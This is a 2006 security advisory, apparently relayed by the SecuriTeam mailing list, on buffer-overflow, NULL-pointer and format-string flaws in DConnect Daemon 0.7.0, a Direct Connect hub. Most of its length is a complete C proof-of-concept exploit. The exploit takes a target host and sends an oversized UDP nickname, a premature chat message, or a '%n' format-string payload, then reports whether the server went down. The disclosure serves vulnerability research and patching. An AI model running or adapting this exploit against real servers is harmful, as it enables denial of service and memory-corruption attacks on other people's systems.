The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
DConnect Daemon Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.dc.ds.pg.gda.pl/> DConnect Daemon is "a Direct Connect's hub
working as daemon". Multiple vulnerabilities have been found in DConnect
Daemon allowing remote attackers to overflow an internal buffer, cause a
NULL pointer to be used, and attack using a format string various
functions.
DETAILS
Vulnerable Systems:
* DConnect Daemon version 0.7.0 and prior
* DConnect Daemon CVS 30 Jul 2006 and prior
A] listen_thread_udp buffer-overflow
The main function which handles the UDP packets is affected by a
buffer-overflow vulnerability which happens when a nickname longer than 32
(NICK_LEN) chars is received. The UDP port is disabled by default, the
min_slots parameter in dcd.conf must be enabled for using this service.
From main.c:
void listen_thread_udp(void *args)
...
char *ip=NULL, bufor[10001], *cmd=NULL, *nick=NULL, *s_slots=NULL,
*__strtok_temp__=NULL, nick_prev[NICK_LEN], *filename;
...
if (!i)nick_prev[0]=0;
else strcpy(nick_prev,nick);
...
B] dc_chat NULL pointer
The dc_chat function used for handling the messages received from the
clients leads to a crash caused by usr->nick which points to NULL if the
client has not sent its nickname yet (so it's enough to send a message as
first command for exploiting this bug).
From cmd.dc.c:
void dc_chat(dc_param_t *param)
{
userrec_t *usr = param->usr;
...
if (strcmp(cmd,usr->nick))
...
C] Various format string bugs (privileges needed)
privmsg and pubmsg are two functions used to send messages to one or more
users. Both the functions require a format argument (like printf) which is
missed in some parts of the code. These format string vulnerabilities can
be exploited only if the attacker has superior user or administrator
privileges.
From cmd.user.c:
void chat_msg(chat_param_t *param)
...
if (user[n]!=usr) pubmsg(user[n],msg);
...
void chat_msg_all(chat_param_t *param)
...
pubmsg(NULL,par);
...
void chat_msg_prv(chat_param_t *param)
...
if (user[n]!=usr) privmsg(user[n],NULL,msg);
...
void chat_msg_prv_all(chat_param_t *param)
...
privmsg(NULL,NULL,msg);
...
From penalties.c:
void penalprvmsg(userrec_t *to, char *op, char *fmt, ...)
...
privmsg(to,op,str);
...
From cmd.dc.c:
void dc_OpForceMove(dc_param_t *param)
...
privmsg(usr,NULL,msg);
...
Solution:
CVS 31 Jul 2006:
cvs -d:pserver:anonymous@cvs.ds.pg.gda.pl:/home/cvsroot get dc-hub
Exploit:
/*
by Luigi Auriemma - http://aluigi.org/poc/dconnx.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#define strnicmp strncasecmp
#endif
#define VER "0.1"
#define PORT 411
#define BUFFSZ 8192
#define BOFSZ 400 // total pck size is 10000
void dcsend(int sd, u_char *cmd);
void dcrecv(int sd, u_char *buff, int size);
void delimit(u_char *p);
void show_dc_users(u_char *data, u_char *mynick);
u_int resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
u_int seed;
int sd,
attack,
i,
len;
u_short port = PORT;
u_char *buff,
nick[33],
dnick[33],
pass[33],
key[128];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"DConnect Daemon <= 0.7.0 and CVS 30 Jul 2006 multiple
vulnerabilities "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%hu)]\n"
"\n"
"Attacks:\n"
" 1 = listen_thread_udp buffer-overflow\n"
" 2 = dc_chat NULL pointer\n"
" 3 = various format string bugs (privileges needed)\n"
"\n", argv[0], port);
exit(1);
}
attack = atoi(argv[1]);
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));
buff = malloc(BUFFSZ);
if(!buff) std_err();
seed = time(NULL);
sprintf(nick, "nick%u", ~seed);
for(i = 0; i < (sizeof(key) - 1); i++) {
seed = (seed * 0x343FD) + 0x269EC3;
key[i] = seed;
if(!key[i]) key[i] = 1;
}
key[i] = 0;
if(attack == 1) {
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
len = sprintf(buff,
"$SR nickname%0*u filename" "\x05" "3/9",
BOFSZ,
seed);
printf(
"- send buffer-overflow packet (%d bytes for a buffer of
32)\n"
" Note that the min_slots parameter in the server must be
enabled\n",
BOFSZ);
if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer,
sizeof(peer))
< 0) std_err();
goto check;
}
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
printf("- connect to server: ");
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
printf("ok\n");
do {
dcrecv(sd, buff, BUFFSZ);
} while(strnicmp(buff, "$Lock ", 6));
if(attack == 2) {
sprintf(buff, "<%s> message|", nick);
dcsend(sd, buff);
goto check;
}
sprintf(buff, "$Key %s|", key);
dcsend(sd, buff);
if(attack == 3) {
printf("- insert the nickanme of the superior user or the
administrator:\n ");
fflush(stdin);
fgets(nick, sizeof(nick), stdin);
delimit(nick);
printf("- insert the required password:\n ");
fflush(stdin);
fgets(pass, sizeof(pass), stdin);
delimit(pass);
}
sprintf(buff, "$ValidateNick %s|", nick);
dcsend(sd, buff);
if(attack == 3) {
sprintf(buff, "$MyPass %s|", pass);
dcsend(sd, buff);
}
do {
dcrecv(sd, buff, BUFFSZ);
} while(strnicmp(buff, "$Hello ", 7));
sprintf(buff, "$MyINFO $ALL %s description$ $Cable" "\x01"
"$email$800000000$|", nick);
dcsend(sd, buff);
do {
dcrecv(sd, buff, BUFFSZ);
} while(strnicmp(buff, "$MyINFO ", 8));
if(attack == 3) {
sprintf(buff, "$GetNickList |");
dcsend(sd, buff);
do {
dcrecv(sd, buff, BUFFSZ);
} while(strnicmp(buff, "$NickList ", 10));
printf("- insert the nickname of another user from the list
below:\n");
show_dc_users(buff, nick);
printf(" ");
fflush(stdin);
fgets(dnick, sizeof(dnick), stdin);
delimit(dnick);
sprintf(buff, "<%s> #msg %s %%n%%n%%n%%n%%n%%n%%n|", nick, dnick);
dcsend(sd, buff);
// unfortunately this useful command doesn't work for unknown
reasons...
// sprintf(buff, "<%s> #msg_all %%n%%n%%n%%n%%n%%n%%n|", nick);
// dcsend(sd, buff);
}
check:
sleep(ONESEC);
close(sd);
sleep(ONESEC);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
printf("- check server:\n");
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
printf("\n Server IS vulnerable!!!\n\n");
} else {
printf("\n Server doesn't seem vulnerable\n\n");
}
close(sd);
return(0);
}
void dcsend(int sd, u_char *cmd) {
int cmdlen;
u_char *p;
p = strchr(cmd, ' ');
cmdlen = (p) ? (p - cmd) : (strlen(cmd) - 1);
if(cmd[0] == '<') {
printf("- send message\n");
} else {
printf("- send %.*s command\n", cmdlen, cmd);
}
if(send(sd, cmd, strlen(cmd), 0)
< 0) std_err();
}
void dcrecv(int sd, u_char *buff, int size) {
int t;
u_char *p;
p = buff;
for(--size; size >= 0; p++, size--) {
t = recv(sd, p, 1, 0);
if(t < 0) std_err();
if(!t) break;
if(*p == '|') break;
}
*p = 0;
printf(": %s\n", buff);
}
void delimit(u_char *p) {
while(*p && (*p != '\n') && (*p != '\r')) p++;
*p = 0;
}
void show_dc_users(u_char *data, u_char *mynick) {
u_char *p,
*l;
for(p = strchr(data, ' ') + 1; *p; p++) {
if(*p == '$') continue;
l = strchr(p, '$');
if(!l) break;
*l = 0;
if(!strcmp(p, mynick)) {
printf(" %s (this is your nick and you cannot choose it)\n",
p);
} else {
printf(" %s\n", p);
}
p = l;
}
}
u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_int *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/dconnx-adv.txt>
http://aluigi.altervista.org/adv/dconnx-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
